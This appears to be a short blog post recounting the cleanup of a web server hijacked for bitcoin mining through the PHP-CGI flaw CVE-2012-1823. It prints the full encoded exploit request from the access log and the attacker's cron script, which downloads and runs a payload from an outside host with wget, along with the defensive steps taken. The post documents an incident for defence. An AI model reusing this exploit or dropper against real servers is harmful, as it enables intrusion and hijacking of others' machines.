A friend of mine had issues with a web server being very slow and sometimes even unavailable.

When I connected I found a process eating all the CPU time available. It was mining bitcoins.

What I found is that they used this vulnerabilty: CVE-2012-1823 to execute arbitrary code.

access.log is full of lines like this one:

127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] “POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0” 504 529 “-” “-”

Used to download and execute this script:

cat /tmp/update

#!/bin/sh
plm=ps x|grep mine.cc.st:3333|grep -v grep|awk ’{print $7}’
if [“$plm” != “”]
then echo “MERGE!!!”
else
nohup wget http://update.cc.st/a && sh a >> /dev/null &
fi

Put in crontab, this script checks if the miner is working, otherwise it downloads and executes it again: http://pastebin.com/4PVDpkCe

Using an apache vulnerability means that the result code will be executed by www-data , without a real console access and with limited privileges over file system.

What I did, so far, is to stop the mining process, add update.cc.st to /etc/hosts poiting to localhost, disable /cgi-bin/php from the default domain and clean the file system. Now I will wait for my friend to decide if she wants to procede with an update or, better, a complete reinstall..